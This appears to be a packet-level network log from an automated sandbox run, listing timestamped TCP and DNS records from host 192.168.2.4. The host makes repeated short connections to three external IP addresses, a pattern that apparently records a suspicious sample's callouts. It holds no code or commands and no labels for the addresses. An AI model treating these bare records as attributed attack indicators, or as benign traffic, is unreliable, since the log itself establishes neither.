                                                                                                                                                        Dec 19, 2024 08:19:33.688836098 CET44349806172.217.17.65192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:33.688900948 CET49806443192.168.2.4172.217.17.65
                                                                                                                                                        Dec 19, 2024 08:19:33.691828966 CET44349806172.217.17.65192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:33.691879034 CET49806443192.168.2.4172.217.17.65
                                                                                                                                                        Dec 19, 2024 08:19:33.691940069 CET44349806172.217.17.65192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:33.692034960 CET49806443192.168.2.4172.217.17.65
                                                                                                                                                        Dec 19, 2024 08:19:33.695202112 CET44349806172.217.17.65192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:33.695271969 CET49806443192.168.2.4172.217.17.65
                                                                                                                                                        Dec 19, 2024 08:19:33.695290089 CET44349806172.217.17.65192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:33.695334911 CET49806443192.168.2.4172.217.17.65
                                                                                                                                                        Dec 19, 2024 08:19:33.698348999 CET44349806172.217.17.65192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:33.698431969 CET49806443192.168.2.4172.217.17.65
                                                                                                                                                        Dec 19, 2024 08:19:33.698523045 CET44349806172.217.17.65192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:33.698786974 CET49806443192.168.2.4172.217.17.65
                                                                                                                                                        Dec 19, 2024 08:19:33.701306105 CET44349806172.217.17.65192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:33.701380968 CET49806443192.168.2.4172.217.17.65
                                                                                                                                                        Dec 19, 2024 08:19:33.701385975 CET44349806172.217.17.65192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:33.701531887 CET49806443192.168.2.4172.217.17.65
                                                                                                                                                        Dec 19, 2024 08:19:33.704329014 CET44349806172.217.17.65192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:33.704402924 CET49806443192.168.2.4172.217.17.65
                                                                                                                                                        Dec 19, 2024 08:19:33.704454899 CET44349806172.217.17.65192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:33.704520941 CET49806443192.168.2.4172.217.17.65
                                                                                                                                                        Dec 19, 2024 08:19:33.707412958 CET44349806172.217.17.65192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:33.707489967 CET49806443192.168.2.4172.217.17.65
                                                                                                                                                        Dec 19, 2024 08:19:33.707495928 CET44349806172.217.17.65192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:33.707576990 CET49806443192.168.2.4172.217.17.65
                                                                                                                                                        Dec 19, 2024 08:19:33.707930088 CET44349806172.217.17.65192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:33.707982063 CET49806443192.168.2.4172.217.17.65
                                                                                                                                                        Dec 19, 2024 08:19:33.710351944 CET44349806172.217.17.65192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:33.710695982 CET49806443192.168.2.4172.217.17.65
                                                                                                                                                        Dec 19, 2024 08:19:33.710860014 CET44349806172.217.17.65192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:33.710958004 CET49806443192.168.2.4172.217.17.65
                                                                                                                                                        Dec 19, 2024 08:19:33.713387966 CET44349806172.217.17.65192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:33.713438988 CET49806443192.168.2.4172.217.17.65
                                                                                                                                                        Dec 19, 2024 08:19:33.713876963 CET44349806172.217.17.65192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:33.713978052 CET49806443192.168.2.4172.217.17.65
                                                                                                                                                        Dec 19, 2024 08:19:33.716478109 CET44349806172.217.17.65192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:33.716557026 CET49806443192.168.2.4172.217.17.65
                                                                                                                                                        Dec 19, 2024 08:19:33.716907024 CET44349806172.217.17.65192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:33.716974020 CET49806443192.168.2.4172.217.17.65
                                                                                                                                                        Dec 19, 2024 08:19:33.721101046 CET44349806172.217.17.65192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:33.721154928 CET49806443192.168.2.4172.217.17.65
                                                                                                                                                        Dec 19, 2024 08:19:33.721589088 CET44349806172.217.17.65192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:33.721656084 CET49806443192.168.2.4172.217.17.65
                                                                                                                                                        Dec 19, 2024 08:19:33.726278067 CET44349806172.217.17.65192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:33.726430893 CET49806443192.168.2.4172.217.17.65
                                                                                                                                                        Dec 19, 2024 08:19:33.726763010 CET44349806172.217.17.65192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:33.726814032 CET49806443192.168.2.4172.217.17.65
                                                                                                                                                        Dec 19, 2024 08:19:33.726862907 CET44349806172.217.17.65192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:33.726913929 CET49806443192.168.2.4172.217.17.65
                                                                                                                                                        Dec 19, 2024 08:19:33.727871895 CET44349806172.217.17.65192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:33.727951050 CET49806443192.168.2.4172.217.17.65
                                                                                                                                                        Dec 19, 2024 08:19:33.736505032 CET44349806172.217.17.65192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:33.736599922 CET49806443192.168.2.4172.217.17.65
                                                                                                                                                        Dec 19, 2024 08:19:33.736607075 CET44349806172.217.17.65192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:33.736766100 CET49806443192.168.2.4172.217.17.65
                                                                                                                                                        Dec 19, 2024 08:19:33.736887932 CET44349806172.217.17.65192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:33.736943007 CET44349806172.217.17.65192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:33.736943960 CET49806443192.168.2.4172.217.17.65
                                                                                                                                                        Dec 19, 2024 08:19:33.737040997 CET49806443192.168.2.4172.217.17.65
                                                                                                                                                        Dec 19, 2024 08:19:33.737966061 CET49806443192.168.2.4172.217.17.65
                                                                                                                                                        Dec 19, 2024 08:19:33.737982035 CET44349806172.217.17.65192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:34.198416948 CET4982080192.168.2.4193.122.130.0
                                                                                                                                                        Dec 19, 2024 08:19:34.318000078 CET8049820193.122.130.0192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:34.318949938 CET4982080192.168.2.4193.122.130.0
                                                                                                                                                        Dec 19, 2024 08:19:34.319214106 CET4982080192.168.2.4193.122.130.0
                                                                                                                                                        Dec 19, 2024 08:19:34.438812971 CET8049820193.122.130.0192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:35.413820028 CET8049820193.122.130.0192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:35.417264938 CET4982080192.168.2.4193.122.130.0
                                                                                                                                                        Dec 19, 2024 08:19:35.536636114 CET8049820193.122.130.0192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:35.736304045 CET8049820193.122.130.0192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:35.844427109 CET4982080192.168.2.4193.122.130.0
                                                                                                                                                        Dec 19, 2024 08:19:36.197532892 CET49825443192.168.2.4172.67.177.134
                                                                                                                                                        Dec 19, 2024 08:19:36.197587013 CET44349825172.67.177.134192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:36.197658062 CET49825443192.168.2.4172.67.177.134
                                                                                                                                                        Dec 19, 2024 08:19:36.199448109 CET49825443192.168.2.4172.67.177.134
                                                                                                                                                        Dec 19, 2024 08:19:36.199474096 CET44349825172.67.177.134192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:37.416681051 CET44349825172.67.177.134192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:37.416903019 CET49825443192.168.2.4172.67.177.134
                                                                                                                                                        Dec 19, 2024 08:19:37.420191050 CET49825443192.168.2.4172.67.177.134
                                                                                                                                                        Dec 19, 2024 08:19:37.420202971 CET44349825172.67.177.134192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:37.420531988 CET44349825172.67.177.134192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:37.423765898 CET49825443192.168.2.4172.67.177.134
                                                                                                                                                        Dec 19, 2024 08:19:37.471340895 CET44349825172.67.177.134192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:37.887516975 CET44349825172.67.177.134192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:37.887592077 CET44349825172.67.177.134192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:37.887650967 CET49825443192.168.2.4172.67.177.134
                                                                                                                                                        Dec 19, 2024 08:19:37.892568111 CET49825443192.168.2.4172.67.177.134
                                                                                                                                                        Dec 19, 2024 08:19:37.904212952 CET4982080192.168.2.4193.122.130.0
                                                                                                                                                        Dec 19, 2024 08:19:38.023718119 CET8049820193.122.130.0192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:38.225465059 CET8049820193.122.130.0192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:38.227888107 CET49831443192.168.2.4172.67.177.134
                                                                                                                                                        Dec 19, 2024 08:19:38.227931023 CET44349831172.67.177.134192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:38.228023052 CET49831443192.168.2.4172.67.177.134
                                                                                                                                                        Dec 19, 2024 08:19:38.228303909 CET49831443192.168.2.4172.67.177.134
                                                                                                                                                        Dec 19, 2024 08:19:38.228318930 CET44349831172.67.177.134192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:38.266330957 CET4982080192.168.2.4193.122.130.0
                                                                                                                                                        Dec 19, 2024 08:19:39.689331055 CET44349831172.67.177.134192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:39.691061974 CET49831443192.168.2.4172.67.177.134
                                                                                                                                                        Dec 19, 2024 08:19:39.691092968 CET44349831172.67.177.134192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:40.133627892 CET44349831172.67.177.134192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:40.133699894 CET44349831172.67.177.134192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:40.133754969 CET49831443192.168.2.4172.67.177.134
                                                                                                                                                        Dec 19, 2024 08:19:40.134223938 CET49831443192.168.2.4172.67.177.134
                                                                                                                                                        Dec 19, 2024 08:19:40.138405085 CET4982080192.168.2.4193.122.130.0
                                                                                                                                                        Dec 19, 2024 08:19:40.139338017 CET4983780192.168.2.4193.122.130.0
                                                                                                                                                        Dec 19, 2024 08:19:40.258472919 CET8049820193.122.130.0192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:40.258677006 CET4982080192.168.2.4193.122.130.0
                                                                                                                                                        Dec 19, 2024 08:19:40.259000063 CET8049837193.122.130.0192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:40.259229898 CET4983780192.168.2.4193.122.130.0
                                                                                                                                                        Dec 19, 2024 08:19:40.259380102 CET4983780192.168.2.4193.122.130.0
                                                                                                                                                        Dec 19, 2024 08:19:40.378783941 CET8049837193.122.130.0192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:41.356376886 CET8049837193.122.130.0192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:41.357470989 CET49843443192.168.2.4172.67.177.134
                                                                                                                                                        Dec 19, 2024 08:19:41.357530117 CET44349843172.67.177.134192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:41.357597113 CET49843443192.168.2.4172.67.177.134
                                                                                                                                                        Dec 19, 2024 08:19:41.357826948 CET49843443192.168.2.4172.67.177.134
                                                                                                                                                        Dec 19, 2024 08:19:41.357846975 CET44349843172.67.177.134192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:41.407146931 CET4983780192.168.2.4193.122.130.0
                                                                                                                                                        Dec 19, 2024 08:19:42.567262888 CET44349843172.67.177.134192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:42.568984985 CET49843443192.168.2.4172.67.177.134
                                                                                                                                                        Dec 19, 2024 08:19:42.569020987 CET44349843172.67.177.134192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:43.022712946 CET44349843172.67.177.134192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:43.022780895 CET44349843172.67.177.134192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:43.022833109 CET49843443192.168.2.4172.67.177.134
                                                                                                                                                        Dec 19, 2024 08:19:43.023241997 CET49843443192.168.2.4172.67.177.134
                                                                                                                                                        Dec 19, 2024 08:19:43.026606083 CET4983780192.168.2.4193.122.130.0
                                                                                                                                                        Dec 19, 2024 08:19:43.027626038 CET4984580192.168.2.4193.122.130.0
                                                                                                                                                        Dec 19, 2024 08:19:43.146703959 CET8049837193.122.130.0192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:43.146792889 CET4983780192.168.2.4193.122.130.0
                                                                                                                                                        Dec 19, 2024 08:19:43.147089005 CET8049845193.122.130.0192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:43.147178888 CET4984580192.168.2.4193.122.130.0
                                                                                                                                                        Dec 19, 2024 08:19:43.147336006 CET4984580192.168.2.4193.122.130.0
                                                                                                                                                        Dec 19, 2024 08:19:43.266820908 CET8049845193.122.130.0192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:44.242521048 CET8049845193.122.130.0192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:44.244512081 CET49850443192.168.2.4172.67.177.134
                                                                                                                                                        Dec 19, 2024 08:19:44.244568110 CET44349850172.67.177.134192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:44.244626999 CET49850443192.168.2.4172.67.177.134
                                                                                                                                                        Dec 19, 2024 08:19:44.245054960 CET49850443192.168.2.4172.67.177.134
                                                                                                                                                        Dec 19, 2024 08:19:44.245073080 CET44349850172.67.177.134192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:44.297580957 CET4984580192.168.2.4193.122.130.0
                                                                                                                                                        Dec 19, 2024 08:19:45.455785036 CET44349850172.67.177.134192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:45.462495089 CET49850443192.168.2.4172.67.177.134
                                                                                                                                                        Dec 19, 2024 08:19:45.462555885 CET44349850172.67.177.134192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:45.902434111 CET44349850172.67.177.134192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:45.902503967 CET44349850172.67.177.134192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:45.902573109 CET49850443192.168.2.4172.67.177.134
                                                                                                                                                        Dec 19, 2024 08:19:45.902992964 CET49850443192.168.2.4172.67.177.134
                                                                                                                                                        Dec 19, 2024 08:19:45.910096884 CET4985680192.168.2.4193.122.130.0
                                                                                                                                                        Dec 19, 2024 08:19:46.029557943 CET8049856193.122.130.0192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:46.029697895 CET4985680192.168.2.4193.122.130.0
                                                                                                                                                        Dec 19, 2024 08:19:46.029876947 CET4985680192.168.2.4193.122.130.0
                                                                                                                                                        Dec 19, 2024 08:19:46.149344921 CET8049856193.122.130.0192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:47.126243114 CET8049856193.122.130.0192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:47.127561092 CET49857443192.168.2.4172.67.177.134
                                                                                                                                                        Dec 19, 2024 08:19:47.127643108 CET44349857172.67.177.134192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:47.127794027 CET49857443192.168.2.4172.67.177.134
                                                                                                                                                        Dec 19, 2024 08:19:47.127937078 CET49857443192.168.2.4172.67.177.134
                                                                                                                                                        Dec 19, 2024 08:19:47.127966881 CET44349857172.67.177.134192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:47.172702074 CET4985680192.168.2.4193.122.130.0
                                                                                                                                                        Dec 19, 2024 08:19:48.338716984 CET44349857172.67.177.134192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:48.342521906 CET49857443192.168.2.4172.67.177.134
                                                                                                                                                        Dec 19, 2024 08:19:48.342588902 CET44349857172.67.177.134192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:48.789901972 CET44349857172.67.177.134192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:48.789963007 CET44349857172.67.177.134192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:48.790041924 CET49857443192.168.2.4172.67.177.134
                                                                                                                                                        Dec 19, 2024 08:19:48.790496111 CET49857443192.168.2.4172.67.177.134
                                                                                                                                                        Dec 19, 2024 08:19:48.793911934 CET4985680192.168.2.4193.122.130.0
                                                                                                                                                        Dec 19, 2024 08:19:48.794677019 CET4986380192.168.2.4193.122.130.0
                                                                                                                                                        Dec 19, 2024 08:19:48.913861990 CET8049856193.122.130.0192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:48.913937092 CET4985680192.168.2.4193.122.130.0
                                                                                                                                                        Dec 19, 2024 08:19:48.914097071 CET8049863193.122.130.0192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:48.914166927 CET4986380192.168.2.4193.122.130.0
                                                                                                                                                        Dec 19, 2024 08:19:48.914285898 CET4986380192.168.2.4193.122.130.0
                                                                                                                                                        Dec 19, 2024 08:19:49.033708096 CET8049863193.122.130.0192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:50.119894981 CET8049863193.122.130.0192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:50.123075008 CET49869443192.168.2.4172.67.177.134
                                                                                                                                                        Dec 19, 2024 08:19:50.123106956 CET44349869172.67.177.134192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:50.123193026 CET49869443192.168.2.4172.67.177.134
                                                                                                                                                        Dec 19, 2024 08:19:50.123414040 CET49869443192.168.2.4172.67.177.134
                                                                                                                                                        Dec 19, 2024 08:19:50.123424053 CET44349869172.67.177.134192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:50.172581911 CET4986380192.168.2.4193.122.130.0
                                                                                                                                                        Dec 19, 2024 08:19:51.337810040 CET44349869172.67.177.134192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:51.339364052 CET49869443192.168.2.4172.67.177.134
                                                                                                                                                        Dec 19, 2024 08:19:51.339401960 CET44349869172.67.177.134192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:51.783018112 CET44349869172.67.177.134192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:51.783083916 CET44349869172.67.177.134192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:51.783209085 CET49869443192.168.2.4172.67.177.134
                                                                                                                                                        Dec 19, 2024 08:19:51.783931971 CET49869443192.168.2.4172.67.177.134
                                                                                                                                                        Dec 19, 2024 08:19:51.787286043 CET4986380192.168.2.4193.122.130.0
                                                                                                                                                        Dec 19, 2024 08:19:51.788291931 CET4987180192.168.2.4193.122.130.0
                                                                                                                                                        Dec 19, 2024 08:19:51.907063961 CET8049863193.122.130.0192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:51.907192945 CET4986380192.168.2.4193.122.130.0
                                                                                                                                                        Dec 19, 2024 08:19:51.907751083 CET8049871193.122.130.0192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:51.907824993 CET4987180192.168.2.4193.122.130.0
                                                                                                                                                        Dec 19, 2024 08:19:51.907948017 CET4987180192.168.2.4193.122.130.0
                                                                                                                                                        Dec 19, 2024 08:19:52.027442932 CET8049871193.122.130.0192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:53.010531902 CET8049871193.122.130.0192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:53.011677027 CET49876443192.168.2.4172.67.177.134
                                                                                                                                                        Dec 19, 2024 08:19:53.011718035 CET44349876172.67.177.134192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:53.011795044 CET49876443192.168.2.4172.67.177.134
                                                                                                                                                        Dec 19, 2024 08:19:53.011997938 CET49876443192.168.2.4172.67.177.134
                                                                                                                                                        Dec 19, 2024 08:19:53.012012005 CET44349876172.67.177.134192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:53.063203096 CET4987180192.168.2.4193.122.130.0
                                                                                                                                                        Dec 19, 2024 08:19:54.221744061 CET44349876172.67.177.134192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:54.223455906 CET49876443192.168.2.4172.67.177.134
                                                                                                                                                        Dec 19, 2024 08:19:54.223475933 CET44349876172.67.177.134192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:54.666014910 CET44349876172.67.177.134192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:54.666075945 CET44349876172.67.177.134192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:54.666161060 CET49876443192.168.2.4172.67.177.134
                                                                                                                                                        Dec 19, 2024 08:19:54.666908979 CET49876443192.168.2.4172.67.177.134
                                                                                                                                                        Dec 19, 2024 08:19:54.670278072 CET4987180192.168.2.4193.122.130.0
                                                                                                                                                        Dec 19, 2024 08:19:54.671432018 CET4988280192.168.2.4193.122.130.0
                                                                                                                                                        Dec 19, 2024 08:19:54.790242910 CET8049871193.122.130.0192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:54.790316105 CET4987180192.168.2.4193.122.130.0
                                                                                                                                                        Dec 19, 2024 08:19:54.790859938 CET8049882193.122.130.0192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:54.790946960 CET4988280192.168.2.4193.122.130.0
                                                                                                                                                        Dec 19, 2024 08:19:54.791032076 CET4988280192.168.2.4193.122.130.0
                                                                                                                                                        Dec 19, 2024 08:19:54.910429955 CET8049882193.122.130.0192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:55.894915104 CET8049882193.122.130.0192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:55.896015882 CET49883443192.168.2.4172.67.177.134
                                                                                                                                                        Dec 19, 2024 08:19:55.896075010 CET44349883172.67.177.134192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:55.896142960 CET49883443192.168.2.4172.67.177.134
                                                                                                                                                        Dec 19, 2024 08:19:55.896375895 CET49883443192.168.2.4172.67.177.134
                                                                                                                                                        Dec 19, 2024 08:19:55.896390915 CET44349883172.67.177.134192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:55.938324928 CET4988280192.168.2.4193.122.130.0
                                                                                                                                                        Dec 19, 2024 08:19:57.106708050 CET44349883172.67.177.134192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:57.109006882 CET49883443192.168.2.4172.67.177.134
                                                                                                                                                        Dec 19, 2024 08:19:57.109045982 CET44349883172.67.177.134192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:57.551170111 CET44349883172.67.177.134192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:57.551397085 CET44349883172.67.177.134192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:57.551522017 CET49883443192.168.2.4172.67.177.134
                                                                                                                                                        Dec 19, 2024 08:19:57.552063942 CET49883443192.168.2.4172.67.177.134
                                                                                                                                                        Dec 19, 2024 08:19:57.563256025 CET4988280192.168.2.4193.122.130.0
                                                                                                                                                        Dec 19, 2024 08:19:57.564310074 CET4988980192.168.2.4193.122.130.0
                                                                                                                                                        Dec 19, 2024 08:19:57.683092117 CET8049882193.122.130.0192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:57.683748960 CET8049889193.122.130.0192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:57.683816910 CET4988280192.168.2.4193.122.130.0
                                                                                                                                                        Dec 19, 2024 08:19:57.683856010 CET4988980192.168.2.4193.122.130.0
                                                                                                                                                        Dec 19, 2024 08:19:57.684103012 CET4988980192.168.2.4193.122.130.0
                                                                                                                                                        Dec 19, 2024 08:19:57.803812981 CET8049889193.122.130.0192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:58.781325102 CET8049889193.122.130.0192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:58.782336950 CET49895443192.168.2.4172.67.177.134
                                                                                                                                                        Dec 19, 2024 08:19:58.782371998 CET44349895172.67.177.134192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:58.782450914 CET49895443192.168.2.4172.67.177.134
                                                                                                                                                        Dec 19, 2024 08:19:58.782648087 CET49895443192.168.2.4172.67.177.134
                                                                                                                                                        Dec 19, 2024 08:19:58.782660961 CET44349895172.67.177.134192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:58.828881979 CET4988980192.168.2.4193.122.130.0
                                                                                                                                                        Dec 19, 2024 08:19:59.998548031 CET44349895172.67.177.134192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:20:00.000374079 CET49895443192.168.2.4172.67.177.134
                                                                                                                                                        Dec 19, 2024 08:20:00.000402927 CET44349895172.67.177.134192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:20:00.441628933 CET44349895172.67.177.134192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:20:00.441788912 CET44349895172.67.177.134192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:20:00.441889048 CET49895443192.168.2.4172.67.177.134
                                                                                                                                                        Dec 19, 2024 08:20:00.442289114 CET49895443192.168.2.4172.67.177.134
                                                                                                                                                        Dec 19, 2024 08:20:00.477492094 CET4988980192.168.2.4193.122.130.0
                                                                                                                                                        Dec 19, 2024 08:20:00.597404003 CET8049889193.122.130.0192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:20:00.597476006 CET4988980192.168.2.4193.122.130.0
                                                                                                                                                        Dec 19, 2024 08:20:00.628170013 CET49897443192.168.2.4149.154.167.220
                                                                                                                                                        Dec 19, 2024 08:20:00.628194094 CET44349897149.154.167.220192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:20:00.628257036 CET49897443192.168.2.4149.154.167.220
                                                                                                                                                        Dec 19, 2024 08:20:00.628665924 CET49897443192.168.2.4149.154.167.220
                                                                                                                                                        Dec 19, 2024 08:20:00.628679037 CET44349897149.154.167.220192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:20:02.004486084 CET44349897149.154.167.220192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:20:02.004575968 CET49897443192.168.2.4149.154.167.220
                                                                                                                                                        Dec 19, 2024 08:20:02.006083012 CET49897443192.168.2.4149.154.167.220
                                                                                                                                                        Dec 19, 2024 08:20:02.006092072 CET44349897149.154.167.220192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:20:02.006407022 CET44349897149.154.167.220192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:20:02.007663012 CET49897443192.168.2.4149.154.167.220
                                                                                                                                                        Dec 19, 2024 08:20:02.051359892 CET44349897149.154.167.220192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:20:02.501956940 CET44349897149.154.167.220192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:20:02.502041101 CET44349897149.154.167.220192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:20:02.502186060 CET49897443192.168.2.4149.154.167.220
                                                                                                                                                        Dec 19, 2024 08:20:02.504287958 CET49897443192.168.2.4149.154.167.220
                                                                                                                                                        Dec 19, 2024 08:20:08.451915979 CET4984580192.168.2.4193.122.130.0
                                                                                                                                                        Dec 19, 2024 08:20:08.653422117 CET49917443192.168.2.4149.154.167.220
                                                                                                                                                        Dec 19, 2024 08:20:08.653481007 CET44349917149.154.167.220192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:20:08.653783083 CET49917443192.168.2.4149.154.167.220
                                                                                                                                                        Dec 19, 2024 08:20:08.654035091 CET49917443192.168.2.4149.154.167.220
                                                                                                                                                        Dec 19, 2024 08:20:08.654047012 CET44349917149.154.167.220192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:20:10.020932913 CET44349917149.154.167.220192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:20:10.063252926 CET49917443192.168.2.4149.154.167.220
                                                                                                                                                        Dec 19, 2024 08:20:12.480679989 CET49917443192.168.2.4149.154.167.220
                                                                                                                                                        Dec 19, 2024 08:20:12.480704069 CET44349917149.154.167.220192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:20:12.480771065 CET49917443192.168.2.4149.154.167.220
                                                                                                                                                        Dec 19, 2024 08:20:12.480779886 CET44349917149.154.167.220192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:20:13.025593996 CET44349917149.154.167.220192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:20:13.025677919 CET44349917149.154.167.220192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:20:13.025993109 CET49917443192.168.2.4149.154.167.220
                                                                                                                                                        Dec 19, 2024 08:20:13.026316881 CET49917443192.168.2.4149.154.167.220
                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                        Dec 19, 2024 08:19:25.057966948 CET5303753192.168.2.41.1.1.1
                                                                                                                                                        Dec 19, 2024 08:19:25.197334051 CET53530371.1.1.1192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:27.850670099 CET5292653192.168.2.41.1.1.1
                                                                                                                                                        Dec 19, 2024 08:19:27.990449905 CET53529261.1.1.1192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:34.050123930 CET6519053192.168.2.41.1.1.1
                                                                                                                                                        Dec 19, 2024 08:19:34.189230919 CET53651901.1.1.1192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:19:36.054187059 CET5928453192.168.2.41.1.1.1
                                                                                                                                                        Dec 19, 2024 08:19:36.195871115 CET53592841.1.1.1192.168.2.4
                                                                                                                                                        Dec 19, 2024 08:20:00.478123903 CET5405953192.168.2.41.1.1.1
